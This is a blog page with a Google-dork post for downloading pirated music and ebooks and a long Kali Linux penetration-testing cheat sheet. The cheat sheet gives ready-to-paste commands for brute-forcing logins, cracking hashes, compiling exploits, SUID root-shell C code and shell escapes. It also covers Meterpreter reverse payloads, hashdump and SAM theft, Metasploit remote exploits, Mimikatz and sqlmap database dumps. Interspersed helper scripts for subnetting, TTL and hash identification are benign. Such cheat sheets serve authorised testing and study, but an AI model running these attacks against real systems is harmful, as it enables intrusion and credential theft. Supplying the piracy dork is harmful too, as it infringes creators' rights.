Friday 23 June 2017

Download mp3, pdf, zip or rar with a Google dork

Ever wondered how to hack Google for free music or eBooks? Well, here is a way to do that. To download free music, just enter the following query in the Google search box and hit Enter.


?intitle:index.of?mp3 eminem



Now you'll gain access to the whole index of Eminem albums, where you can download the songs of your choice. Instead of eminem you can substitute the name of your favourite album. To search for eBooks, all you have to do is replace 'eminem' with your favourite book name. Also replace 'mp3' with 'pdf', 'zip' or 'rar'.



I hope you enjoy using Google for hacking stuff on the Internet. If you've liked this post, please pass your comments. Cheers!

Thursday 22 June 2017

Kali Linux Cheat Sheet for Penetration Testers by rock star devil

Penetration testing (also called pen testing) is the practice of testing a computer system, network or web application to find vulnerabilities that an attacker could exploit. This Kali Linux cheat sheet for penetration testers is a high-level overview of a typical penetration testing workflow, ranging from nmap, sqlmap, IPv4, enumeration and fingerprinting to password cracking. Always check the man pages if you are in doubt or the commands do not work as outlined here (syntax can vary by OS and version) for the operating system you are using (such as BlackBox, Black Ubuntu, ParrotSec OS, Debian, Ubuntu etc.). I've also referenced some guides that I found useful in different sections; they might come in handy.

Recon and Enumeration

NMAP Commands

Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X.
nmap -v -sS -A -T4 target
    Nmap verbose scan: SYN stealth scan with T4 timing (should be OK on a LAN), OS and service version detection, traceroute, and default scripts run against discovered services
nmap -v -sS -p- -A -T4 target
    As above but scans all TCP ports (takes a lot longer)
nmap -v -sU -sS -p- -A -T4 target
    As above but scans all TCP ports plus a UDP scan (takes even longer)
nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.1.X
    Nmap script to scan for vulnerable SMB servers. WARNING: unsafe=1 may knock the target over
ls /usr/share/nmap/scripts/* | grep ftp
    Search the nmap scripts directory for a keyword (ftp in this example)
Router hack using nmap here.

SMB enumeration

In computer networking, Server Message Block (SMB), one version of which was also known as Common Internet File System (CIFS), operates as an application-layer network protocol mainly used for providing shared access to files, printers and serial ports, and miscellaneous communications between nodes on a network.
nbtscan 192.168.1.0/24
    Discover Windows / Samba servers on the subnet; finds Windows MAC addresses and NetBIOS names and discovers the client workgroup / domain
enum4linux -a target-ip
    Do everything: runs all options (finds the Windows client domain / workgroup) apart from dictionary-based share name guessing

Other Host Discovery

Other methods of host discovery that don't use nmap.
netdiscover -r 192.168.1.0/24
    Discovers IP, MAC address and MAC vendor on the subnet from ARP; helpful for confirming you're on the right VLAN at $client site

Python Local Web Server

Python local web server command, handy for serving up shells and exploits on an attacking machine.
python -m SimpleHTTPServer 80
    Run a basic HTTP server, great for serving up shells etc.

Mounting File Shares

How to mount NFS / CIFS, Windows and Linux file shares.
mount 192.168.1.1:/vol/share /mnt/nfs
    Mount an NFS share at /mnt/nfs
mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs
    Mount a Windows CIFS / SMB share on Linux at /mnt/cifs. If you remove password it will prompt on the CLI (more secure, as the password won't end up in bash_history)
net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no
    Mount a Windows share on Windows from the command line
apt-get install smb4k -y
    Install smb4k on Kali, a useful Linux GUI for browsing SMB shares

Basic FingerPrinting

A device fingerprint or machine fingerprint or browser fingerprint is information collected about a remote computing device for the purpose of identification. Fingerprints can be used to fully or partially identify individual users or devices even when cookies are turned off.
nc -v 192.168.1.1 25
telnet 192.168.1.1 25
    Basic versioning / fingerprinting via the displayed banner

SNMP Enumeration

SNMP enumeration is the process of using SNMP to enumerate user accounts on a target system. SNMP employs two major types of software components for communication: the SNMP agent, which is located on the networking device, and the SNMP management station, which communicates with the agent.
snmpcheck -t 192.168.1.X -c public
snmpwalk -c public -v1 192.168.1.X 1 | grep hrSWRunName | cut -d" " -f4
snmpenum -t 192.168.1.X
onesixtyone -c names -i hosts
    SNMP enumeration

DNS Zone Transfers

nslookup -> set type=any -> ls -d blah.com
    Windows DNS zone transfer
dig axfr blah.com @ns1.blah.com
    Linux DNS zone transfer

DNSRecon

DNSRecon provides the ability to perform:
  1. Check all NS records for zone transfers
  2. Enumerate general DNS records for a given domain (MX, SOA, NS, A, AAAA, SPF and TXT)
  3. Perform common SRV record enumeration
  4. Top Level Domain (TLD) expansion
  5. Check for wildcard resolution
  6. Brute force subdomain and host A and AAAA records given a domain and a wordlist
  7. Perform a PTR record lookup for a given IP range or CIDR
  8. Check a DNS server's cached records for A, AAAA and CNAME records, provided a list of host records in a text file to check
  9. Enumerate common mDNS records on the local network
  10. Enumerate hosts and subdomains using Google
dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml

HTTP / HTTPS Webserver Enumeration

nikto -h 192.168.1.1
    Perform a nikto scan against the target
dirbuster
    Configure via the GUI; CLI input doesn't work most of the time

Packet Inspection

tcpdump tcp port 80 -w output.pcap -i eth0
    tcpdump for port 80 on interface eth0, output written to output.pcap

Username Enumeration

Some techniques used to remotely enumerate users on a target system.

SMB User Enumeration

python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX
    Enumerate users from SMB
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt
    RID cycle SMB / enumerate users from SMB

SNMP User Enumeration

snmpwalk -c public -v1 192.168.X.XXX 1 | grep 77.1.2.25 | cut -d" " -f4
    Enumerate users from SNMP
python /usr/share/doc/python-impacket-doc/examples/samrdump.py SNMP 192.168.X.XXX
    Enumerate users from SNMP
nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt (then grep)
    Search for SNMP servers with nmap, grepable output

Passwords

Wordlists

/usr/share/wordlists
    Kali wordlists
Massive wordlist here at g0tm1lk's blog

Brute Forcing Services

Hydra FTP Brute Force

Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely. On Ubuntu it can be installed from the Synaptic package manager. On Kali Linux it is pre-installed.
hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX ftp -V
    Hydra FTP brute force

Hydra POP3 Brute Force

hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX pop3 -V
    Hydra POP3 brute force

Hydra SMTP Brute Force

hydra -P /usr/share/wordlists/nmap.lst 192.168.X.XXX smtp -V
    Hydra SMTP brute force
Use -t to limit concurrent connections, example: -t 15
Guide to cracking passwords using Hydra here

Password Cracking

John The Ripper - JTR

John the Ripper is different from tools like Hydra. Hydra does blind brute-forcing by trying username/password combinations against a service daemon such as an FTP or telnet server. John, however, needs the hash first. So the greater challenge for a hacker is to first get the hash that is to be cracked. Nowadays hashes are more easily crackable using free rainbow tables available online. Just go to one of the sites, submit the hash and, if the hash is made of a common word, the site will show the word almost instantly. Rainbow tables basically store common words and their hashes in a large database. The larger the database, the more words are covered.
john --wordlist=/usr/share/wordlists/rockyou.txt hashes
    JTR password cracking with a wordlist
john --format=descrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
    JTR forced descrypt cracking with a wordlist
john --format=descrypt hash --show
    JTR forced descrypt, show the cracked passwords
Guide to cracking passwords using John the Ripper here

Exploit Research

Ways to find exploits for enumerated hosts / services.
searchsploit windows 2003 | grep -i local
    Search exploit-db for an exploit; in this example Windows 2003 + local escalation
site:exploit-db.com exploit kernel <= 3
    Use Google to search exploit-db.com for exploits
grep -R "W7" /usr/share/metasploit-framework/modules/exploits/windows/*
    Search Metasploit modules using grep (msf search is a bit weak)
Full guide with screenshots for searching exploits here

Compiling Exploits

Identifying if C code is for Windows or Linux

C #includes will indicate which OS should be used to build the exploit.
process.h, string.h, winbase.h, windows.h, winsock2.h
    Windows exploit code
arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/socket.h, sys/types.h, unistd.h
    Linux exploit code
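As an added example (not part of the original cheat sheet), here is a small Python script that applies the table above mechanically: it pulls the header names out of a C file's #include lines and reports which platform they point at. The header lists are the two rows above; the sample sources are constructed skeletons, and treating string.h on its own as inconclusive is this example's own assumption (it is standard C on both platforms).

```python
"""Guess whether a C source file is meant for Windows or Linux from its #includes.

Added example, not part of the original cheat sheet. Header lists come from the
table above; the sample sources are constructed. The rule that string.h alone is
inconclusive is this example's assumption, not the cheat sheet's.
"""
import re

WINDOWS_HEADERS = {"process.h", "string.h", "winbase.h", "windows.h", "winsock2.h"}
LINUX_HEADERS = {"arpa/inet.h", "fcntl.h", "netdb.h", "netinet/in.h",
                 "sys/socket.h", "sys/types.h", "unistd.h"}

# Matches `#include <x.h>` and `#include "x.h"`, tolerating whitespace after '#'.
INCLUDE_RE = re.compile(r'^\s*#\s*include\s*[<"]([^>"]+)[>"]', re.MULTILINE)


def included_headers(source: str) -> list:
    """Header names from every #include directive, in source order."""
    return INCLUDE_RE.findall(source)


def guess_platform(source: str) -> str:
    """Return 'windows', 'linux', 'mixed' or 'unknown'."""
    headers = set(included_headers(source))
    win = (headers & WINDOWS_HEADERS) - {"string.h"}   # string.h is portable C
    lin = headers & LINUX_HEADERS
    if win and lin:
        return "mixed"      # likely #ifdef blocks for both targets
    if win:
        return "windows"
    if lin:
        return "linux"
    return "unknown"


# Constructed sample sources (skeletons only, no exploit logic).
WIN_SRC = """#include <winsock2.h>
#include <windows.h>
#include <string.h>
int main(void) { return 0; }
"""
LINUX_SRC = """#include <sys/types.h>
# include <sys/socket.h>
#include "unistd.h"
int main(void) { return 0; }
"""
PORTABLE_SRC = "#include <string.h>\n#include <stdio.h>\nint main(void) { return 0; }\n"

if __name__ == "__main__":
    for label, src in (("win", WIN_SRC), ("linux", LINUX_SRC), ("portable", PORTABLE_SRC)):
        print(label, guess_platform(src), included_headers(src))
```

Run it against any exploit.c before reaching for gcc or mingw; a "mixed" result usually means the file carries #ifdef _WIN32 sections for both targets and you should read it rather than trust the guess.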

Build Exploit GCC

Compile exploit gcc.
gcc -o exploit exploit.c
    Basic GCC compile

GCC Compile 32Bit Exploit on 64Bit Kali

Handy for cross compiling 32 bit binaries on 64 bit attacking machines.
gcc -m32 exploit.c -o exploit
    Cross compile a 32 bit binary on 64 bit Linux

Compile Windows .exe on Linux

Build / compile windows exploits on Linux, resulting in a .exe file.
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe
    Compile a Windows .exe on Linux

SUID Binary

Often SUID C binaries are required to spawn a shell as the superuser; you can update the UID / GID and shell as required.
Below are some quick copy-and-paste examples for various shells:

SUID C Shell for /bin/bash

#define _GNU_SOURCE     /* setresuid() is a GNU extension */
#include <stdlib.h>     /* system() */
#include <unistd.h>     /* setresuid() */
int main(void){
    setresuid(0, 0, 0); /* real, effective and saved UID all set to root */
    system("/bin/bash");
    return 0;
}

SUID C Shell for /bin/sh

#define _GNU_SOURCE     /* setresuid() is a GNU extension */
#include <stdlib.h>     /* system() */
#include <unistd.h>     /* setresuid() */
int main(void){
    setresuid(0, 0, 0); /* real, effective and saved UID all set to root */
    system("/bin/sh");
    return 0;
}

Building the SUID Shell binary

gcc -o suid suid.c
For 32 bit:
gcc -m32 -o suid suid.c

TTY Shells

Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su from reverse shells.

Python TTY Shell Trick

python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import os; os.system("/bin/bash")'

Spawn Interactive sh shell

/bin/sh -i

Spawn Perl TTY Shell

exec "/bin/sh";
perl -e 'exec "/bin/sh";'

Spawn Ruby TTY Shell

exec "/bin/sh"

Spawn Lua TTY Shell

os.execute('/bin/sh')

Spawn TTY Shell from Vi

Run shell commands from vi:
:!bash

Spawn TTY Shell NMAP

!sh

Metasploit

Metasploit was created by H. D. Moore in 2003 as a portable network tool using Perl. By 2007, the Metasploit Framework had been completely rewritten in Ruby. On October 21, 2009, the Metasploit Project announced that it had been acquired by Rapid7, a security company that provides unified vulnerability management solutions.
Like comparable commercial products such as Immunity's Canvas or Core Security Technologies' Core Impact, Metasploit can be used to test the vulnerability of computer systems or to break into remote systems. Like many information security tools, Metasploit can be used for both legitimate and unauthorized activities. Since the acquisition of the Metasploit Framework, Rapid7 has added two open core proprietary editions called Metasploit Express and Metasploit Pro.
Metasploit's emerging position as the de facto exploit development framework led to the release of software vulnerability advisories often accompanied by a third-party Metasploit exploit module that highlights the exploitability, risk and remediation of that particular bug. Metasploit 3.0 began to include fuzzing tools, used to discover software vulnerabilities, rather than just exploits for known bugs. This avenue can be seen with the integration of the lorcon wireless (802.11) toolset into Metasploit 3.0 in November 2006. Metasploit 4.0 was released in August 2011.

Meterpreter Payloads

Windows reverse meterpreter payload

set payload windows/meterpreter/reverse_tcp
    Windows reverse TCP payload

Windows VNC Meterpreter payload

set payload windows/vncinject/reverse_tcp
set ViewOnly false
    Meterpreter Windows VNC payload

Linux Reverse Meterpreter payload

set payload linux/meterpreter/reverse_tcp
    Meterpreter Linux reverse payload

Meterpreter Cheat Sheet

Useful meterpreter commands.
upload file c:\\windows
    Meterpreter: upload a file to the Windows target
download c:\\windows\\repair\\sam /tmp
    Meterpreter: download a file from the Windows target
execute -f c:\\windows\\temp\\exploit.exe
    Meterpreter: run an .exe on the target, handy for executing uploaded exploits
execute -f cmd -c
    Creates a new channel with a cmd shell
ps
    Meterpreter: show processes
shell
    Meterpreter: get a shell on the target
getsystem
    Meterpreter: attempt privilege escalation on the target
hashdump
    Meterpreter: attempt to dump the password hashes on the target
portfwd add -l 3389 -p 3389 -r target
    Meterpreter: create a port forward to the target machine
portfwd delete -l 3389 -p 3389 -r target
    Meterpreter: delete the port forward

Common Metasploit Modules

Remote Windows Metasploit Modules (exploits)

use exploit/windows/smb/ms08_067_netapi
    MS08_067 Windows 2k, XP, 2003 remote exploit
use exploit/windows/dcerpc/ms06_040_netapi
    MS06_040 Windows NT, 2k, XP, 2003 remote exploit
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
    MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) remote exploit

Local Windows Metasploit Modules (exploits)

use exploit/windows/local/bypassuac
    Bypass UAC on Windows 7+; set target + arch, x86/64

Auxiliary Metasploit Modules

use auxiliary/scanner/http/dir_scanner
    Metasploit HTTP directory scanner
use auxiliary/scanner/http/jboss_vulnscan
    Metasploit JBoss vulnerability scanner
use auxiliary/scanner/mssql/mssql_login
    Metasploit MSSQL credential scanner
use auxiliary/scanner/mysql/mysql_version
    Metasploit MySQL version scanner
use auxiliary/scanner/oracle/oracle_login
    Metasploit Oracle login module

Metasploit Powershell Modules

use exploit/multi/script/web_delivery
    Metasploit PowerShell payload delivery module
post/windows/manage/powershell/exec_powershell
    Metasploit upload and run a PowerShell script through a session
use exploit/multi/http/jboss_maindeployer
    Metasploit JBoss deploy
use exploit/windows/mssql/mssql_payload
    Metasploit MSSQL payload

Post Exploit Windows Metasploit Modules

run post/windows/gather/win_privs
    Metasploit show privileges of the current user
use post/windows/gather/credentials/gpp
    Metasploit grab GPP saved passwords
load mimikatz -> wdigest
    Metasploit load Mimikatz
run post/windows/gather/local_admin_search_enum
    Identify other machines that the supplied domain user has administrative access to

Networking

TTL Fingerprinting

Operating System  TTL Size
Windows           128
Linux             64
Solaris           255
Cisco / Network   255
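The table above is normally read in reverse: the TTL you see in a capture has been decremented once per hop, so you round it up to the nearest initial value (64, 128 or 255) to get the OS family and the difference gives the hop count. The following Python script is an added example, not part of the original cheat sheet; it applies that rule to constructed packet summary lines (not captured traffic) and, from a defender's side, flags a source address whose packets arrive with TTLs that imply different initial values, which is a cheap sign of spoofed or proxied traffic.

```python
"""Guess a sender's OS family and hop distance from the IP TTL seen on the wire.

Added example, not part of the original cheat sheet. INITIAL_TTLS is the table
above; SAMPLE is constructed input in a made-up "src=... ttl=..." summary format.
"""
import re

# Initial TTL values from the table above, keyed by OS family.
INITIAL_TTLS = {64: "Linux", 128: "Windows", 255: "Solaris / Cisco / network device"}


def guess_from_ttl(observed: int) -> tuple:
    """Return (os_family, initial_ttl, hops) for an observed TTL value.

    The initial TTL is taken to be the smallest table value >= observed, and
    hops = initial - observed (each router decrements the TTL by one).
    """
    if not 0 < observed <= 255:
        raise ValueError("TTL must be in 1..255")
    for initial in sorted(INITIAL_TTLS):
        if observed <= initial:
            return INITIAL_TTLS[initial], initial, initial - observed
    raise AssertionError("unreachable: 255 is in the table")


SUMMARY_RE = re.compile(r"src=(?P<src>[\d.]+)\s+ttl=(?P<ttl>\d+)")


def analyse_summaries(lines) -> dict:
    """Group packet summaries by source; report OS guess, hops and inconsistency."""
    seen = {}
    for line in lines:
        m = SUMMARY_RE.search(line)
        if not m:
            continue
        src, ttl = m.group("src"), int(m.group("ttl"))
        seen.setdefault(src, set()).add(ttl)
    report = {}
    for src, ttls in seen.items():
        families = {guess_from_ttl(t)[0] for t in ttls}
        os_family, _initial, hops = guess_from_ttl(max(ttls))
        report[src] = {
            "os": os_family,
            "hops": hops,
            # Two different initial-TTL families from one address is suspicious.
            "inconsistent": len(families) > 1,
        }
    return report


# Constructed sample lines (not captured traffic).
SAMPLE = [
    "src=10.0.0.5 ttl=61 proto=tcp dport=22",
    "src=10.0.0.5 ttl=61 proto=tcp dport=22",
    "src=10.0.0.9 ttl=121 proto=tcp dport=445",
    "src=203.0.113.7 ttl=250 proto=udp dport=161",
    "src=203.0.113.7 ttl=50 proto=udp dport=161",   # same source, wildly different TTL
]

if __name__ == "__main__":
    for src, info in analyse_summaries(SAMPLE).items():
        print(src, info)
```

The guess is only as good as the table: hardened hosts can set a custom initial TTL, and a load balancer or NAT in the path can rewrite it, so treat a TTL mismatch as a prompt to look closer rather than as proof of spoofing.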

IPv4

Classful IP Ranges

E.g. Class A, B, C (deprecated)
Class    IP Address Range
Class A  0.0.0.0 - 127.255.255.255
Class B  128.0.0.0 - 191.255.255.255
Class C  192.0.0.0 - 223.255.255.255
Class D  224.0.0.0 - 239.255.255.255
Class E  240.0.0.0 - 255.255.255.255

IPv4 Private Address Ranges

Class                          Range
Class A Private Address Range  10.0.0.0 - 10.255.255.255
Class B Private Address Range  172.16.0.0 - 172.31.255.255
Class C Private Address Range  192.168.0.0 - 192.168.255.255
Loopback Address Range         127.0.0.0 - 127.255.255.255

IPv4 Subnet Cheat Sheet

CIDR  Decimal Mask     Number of Hosts
/31   255.255.255.254  1 Host
/30   255.255.255.252  2 Hosts
/29   255.255.255.248  6 Hosts
/28   255.255.255.240  14 Hosts
/27   255.255.255.224  30 Hosts
/26   255.255.255.192  62 Hosts
/25   255.255.255.128  126 Hosts
/24   255.255.255.0    254 Hosts
/23   255.255.254.0    512 Hosts
/22   255.255.252.0    1022 Hosts
/21   255.255.248.0    2046 Hosts
/20   255.255.240.0    4094 Hosts
/19   255.255.224.0    8190 Hosts
/18   255.255.192.0    16382 Hosts
/17   255.255.128.0    32766 Hosts
/16   255.255.0.0      65534 Hosts
/15   255.254.0.0      131070 Hosts
/14   255.252.0.0      262142 Hosts
/13   255.248.0.0      524286 Hosts
/12   255.240.0.0      1048674 Hosts
/11   255.224.0.0      2097150 Hosts
/10   255.192.0.0      4194302 Hosts
/9    255.128.0.0      8388606 Hosts
/8    255.0.0.0        16777214 Hosts
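Rather than looking the three tables above up by hand, the same facts can be computed from the prefix length with the standard library. The script below is an added example, not part of the original cheat sheet: it classifies an address (classful letter, RFC 1918 private range, loopback), regenerates the CIDR/mask/host-count rows, and gives the first and last usable address of any block. It follows the usual arithmetic (2^(32-prefix) minus network and broadcast), so it reports 510 hosts for /23 and 1048574 for /12 where the table above reads differently, and it counts /31 as 2 usable addresses per RFC 3021 rather than the 1 listed.

```python
"""IPv4 class, private-range and subnet arithmetic for the tables above.

Added example, not part of the original cheat sheet. Uses only the standard
library ipaddress module; the ranges are the ones listed on the page.
"""
import ipaddress

# Private ranges (RFC 1918) and loopback, as listed above.
PRIVATE_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
LOOPBACK_NET = ipaddress.ip_network("127.0.0.0/8")


def ip_class(addr: str) -> str:
    """Classful letter A-E from the first octet, per the classful table above."""
    first = int(ipaddress.IPv4Address(addr)) >> 24
    if first < 128:
        return "A"
    if first < 192:
        return "B"
    if first < 224:
        return "C"
    if first < 240:
        return "D"
    return "E"


def describe(addr: str) -> dict:
    """Class letter plus private/loopback membership for one address."""
    ip = ipaddress.IPv4Address(addr)
    return {
        "class": ip_class(addr),
        "private": any(ip in n for n in PRIVATE_NETS),
        "loopback": ip in LOOPBACK_NET,
    }


def cidr_row(prefix: int) -> tuple:
    """(decimal mask, usable hosts) for /prefix, one row of the subnet cheat sheet."""
    if not 0 <= prefix <= 32:
        raise ValueError("prefix must be in 0..32")
    net = ipaddress.ip_network(f"0.0.0.0/{prefix}")
    total = net.num_addresses              # 2 ** (32 - prefix)
    # /31 (RFC 3021) and /32 have no separate network/broadcast addresses to subtract.
    usable = total if prefix >= 31 else total - 2
    return str(net.netmask), usable


def usable_range(cidr: str) -> tuple:
    """First and last usable host address of the block containing cidr."""
    net = ipaddress.ip_network(cidr, strict=False)   # accept a host address + prefix
    if net.prefixlen >= 31:
        return str(net[0]), str(net[-1])
    return str(net[1]), str(net[-2])


if __name__ == "__main__":
    for p in range(31, 7, -1):
        mask, hosts = cidr_row(p)
        print(f"/{p:<4}{mask:<17}{hosts} Hosts")
    print(describe("172.16.5.4"), usable_range("192.168.1.77/26"))
```

When scoping an engagement or writing firewall rules, feed usable_range the address and prefix exactly as they appear in the client's documentation; strict=False means a host address is accepted and the enclosing block is returned.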

ASCII Table Cheat Sheet

Useful for Web Application Penetration Testing, or if you get stranded on Mars and need to communicate with NASA.
ASCII  Character
x00    Null Byte
x08    BS
x09    TAB
x0a    LF
x0d    CR
x1b    ESC
x20    SPC
x21    !
x22    "
x23    #
x24    $
x25    %
x26    &
x27    '
x28    (
x29    )
x2a    *
x2b    +
x2c    ,
x2d    -
x2e    .
x2f    /
x30    0
x31    1
x32    2
x33    3
x34    4
x35    5
x36    6
x37    7
x38    8
x39    9
x3a    :
x3b    ;
x3c    <
x3d    =
x3e    >
x3f    ?
x40    @
x41    A
x42    B
x43    C
x44    D
x45    E
x46    F
x47    G
x48    H
x49    I
x4a    J
x4b    K
x4c    L
x4d    M
x4e    N
x4f    O
x50    P
x51    Q
x52    R
x53    S
x54    T
x55    U
x56    V
x57    W
x58    X
x59    Y
x5a    Z
x5b    [
x5c    \
x5d    ]
x5e    ^
x5f    _
x60    `
x61    a
x62    b
x63    c
x64    d
x65    e
x66    f
x67    g
x68    h
x69    i
x6a    j
x6b    k
x6c    l
x6d    m
x6e    n
x6f    o
x70    p
x71    q
x72    r
x73    s
x74    t
x75    u
x76    v
x77    w
x78    x
x79    y
x7a    z

CISCO IOS Commands

A collection of useful Cisco IOS commands.
enable
    Enters enable (privileged EXEC) mode
conf t
    Short for configure terminal
(config)# interface fa0/0
    Configure FastEthernet 0/0
(config-if)# ip addr 0.0.0.0 255.255.255.255
    Add an IP address to fa0/0
(config-if)# line vty 0 4
    Configure the vty (telnet) lines
(config-line)# login
    Enable password checking on the telnet lines
(config-line)# password YOUR-PASSWORD
    Set the telnet password
# show running-config
    Show the running config loaded in memory
# show startup-config
    Show the startup config
# show version
    Show the Cisco IOS version
# show session
    Display open sessions
# show ip interface
    Show network interfaces
# show interface e0
    Show detailed interface info
# show ip route
    Show routes
# show access-lists
    Show access lists
# dir file systems
    Show available file systems
# dir all-filesystems
    File information
# dir /all
    Show deleted files
# terminal length 0
    No limit on terminal output
# copy running-config tftp
    Copies the running config to a TFTP server
# copy running-config startup-config
    Copy running-config to startup-config (save the running config)

Cryptography

Hash Lengths

Hash     Size
MD5      16 bytes
SHA-1    20 bytes
SHA-256  32 bytes
SHA-512  64 bytes

Hash Examples

Likely just use hash-identifier for this, but here are some example hashes:
Hash                 Example
MD5                  8743b52063cd84097a65d1633f5c74f5
MD5 $PASS:$SALT      01dfae6e5d4d90d9892622325959afbe:7050461
MD5 $SALT:$PASS      f0fda58630310a6dd91a7d8f0a4ceda2:4225637426
SHA1                 b89eaac7e61417341b710b727768294d0e6a277b
SHA1 $PASS:$SALT     2fc5a684737ce1bf7b3b239df432416e0dd07357:2014
SHA1 $SALT:$PASS     cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024
SHA-256              127e6fbfe24a750e72930c220a8e138275656b8e5d8f48a98c3c92df2caba935
SHA-256 $PASS:$SALT  c73d08de890479518ed60cf670d17faa26a4a71f995c1dcc978165399401a6c4
SHA-256 $SALT:$PASS  eb368a2dfd38b405f014118c7d9747fcc97f4f0ee75c05963cd9da6ee65ef498:560407001617
SHA-512              82a9dda829eb7f8ffe9fbe49e45d47d2dad9664fbb7adf72492e3c81ebd3e29134d9bc12212bf83c6840f10e8246b9db54a4859b7ccd0123d86e5872c1e5082f
SHA-512 $PASS:$SALT  e5c3ede3e49fb86592fb03f471c35ba13e8d89b8ab65142c9a8fdafb635fa2223c24e5558fd9313e8995019dcbec1fb584146b7bb12685c7765fc8c0d51379fd
SHA-512 $SALT:$PASS  976b451818634a1e2acba682da3fd6efa72adf8a7a08d7939550c244b237c72c7d42367544e826c0c83fe5c02f97c0373b6b1386cc794bf0d21d2df01bb9c08a
NTLM                 b4b9b02e6f09a9bd760f388b67351e2b
Guide to identifying a hash and cracking a password using Wireshark here
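The two tables above (digest size and example formats) are all a first-pass identifier needs: the hex length of an unsalted digest narrows the algorithm to one or two candidates, and a trailing ":salt" tells you the layout. The script below is an added example, not part of the original cheat sheet and not hash-identifier's own code; it confirms the length table against hashlib, identifies a token, and can check a known plaintext against a digest in the unsalted, $PASS:$SALT or $SALT:$PASS layouts. The sample digests are copied from the table above; the verification tests use the standard "abc" test vectors. NTLM is MD4 over the UTF-16LE password and is skipped when the local OpenSSL build has MD4 disabled.

```python
"""Identify a hash by hex length and verify a candidate plaintext against it.

Added example, not part of the original cheat sheet. CANDIDATES mirrors the
'Hash Lengths' table above (32 hex = MD5 or NTLM, both 16 bytes); PAGE_EXAMPLES
are the digests listed in the 'Hash Examples' table.
"""
import hashlib
import re

HASHLIB_NAMES = {"MD5": "md5", "SHA-1": "sha1", "SHA-256": "sha256", "SHA-512": "sha512"}

# Hex digest length -> candidate algorithms. 32 hex chars is ambiguous.
CANDIDATES = {32: ["MD5", "NTLM"], 40: ["SHA-1"], 64: ["SHA-256"], 128: ["SHA-512"]}
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")

# Copied from the 'Hash Examples' table above.
PAGE_EXAMPLES = {
    "MD5": "8743b52063cd84097a65d1633f5c74f5",
    "SHA-1": "b89eaac7e61417341b710b727768294d0e6a277b",
    "SHA-256": "127e6fbfe24a750e72930c220a8e138275656b8e5d8f48a98c3c92df2caba935",
    "SHA-512": "82a9dda829eb7f8ffe9fbe49e45d47d2dad9664fbb7adf72492e3c81ebd3e29134d9bc"
               "12212bf83c6840f10e8246b9db54a4859b7ccd0123d86e5872c1e5082f",
    "NTLM": "b4b9b02e6f09a9bd760f388b67351e2b",
}


def digest_bytes(algorithm: str) -> int:
    """Digest size in bytes for the 'Hash Lengths' table, taken from hashlib."""
    return hashlib.new(HASHLIB_NAMES[algorithm]).digest_size


def identify(token: str) -> dict:
    """Split 'digest' or 'digest:salt', validate hex, return candidate algorithms."""
    digest, _, salt = token.strip().partition(":")
    if not HEX_RE.match(digest):
        return {"digest": digest, "salt": salt or None, "candidates": []}
    cands = list(CANDIDATES.get(len(digest), []))
    if salt and "NTLM" in cands:
        cands.remove("NTLM")           # NTLM is never salted
    return {"digest": digest.lower(), "salt": salt or None, "candidates": cands}


def matches(digest: str, plaintext: str, salt: str = "", salt_first: bool = False) -> list:
    """Candidate algorithms for which hash(plaintext[+salt]) equals digest.

    salt_first=False is the $PASS:$SALT layout, salt_first=True is $SALT:$PASS.
    """
    data = (salt + plaintext if salt_first else plaintext + salt).encode()
    hits = []
    for name in identify(digest)["candidates"]:
        if name == "NTLM":
            try:    # MD4 is disabled in many OpenSSL 3 builds; skip rather than fail
                h = hashlib.new("md4", plaintext.encode("utf-16-le")).hexdigest()
            except ValueError:
                continue
        else:
            h = hashlib.new(HASHLIB_NAMES[name], data).hexdigest()
        if h == digest.lower():
            hits.append(name)
    return hits


if __name__ == "__main__":
    for name, example in PAGE_EXAMPLES.items():
        print(f"{name:8} {identify(example)['candidates']}")
    print(matches("900150983cd24fb0d6963f7d28e17f72", "abc"))   # MD5 test vector for "abc"
```

Length alone cannot separate MD5 from NTLM, or SHA-256 from other 256-bit digests, so treat the output as a shortlist; the source of the hash (a SAM dump versus a web application database) is usually what settles it.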

SQLMap Examples

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3
    Automated sqlmap scan
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/blah.php"
    Targeted sqlmap scan
sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump
    Scan URL for union + error based injection with a MySQL backend and use a random user agent + database dump
sqlmap -o -u "http://meh.com/form/" --forms
    sqlmap check form for injection
sqlmap -o -u "http://meh/vuln-form" --forms -D database-name -T users --dump
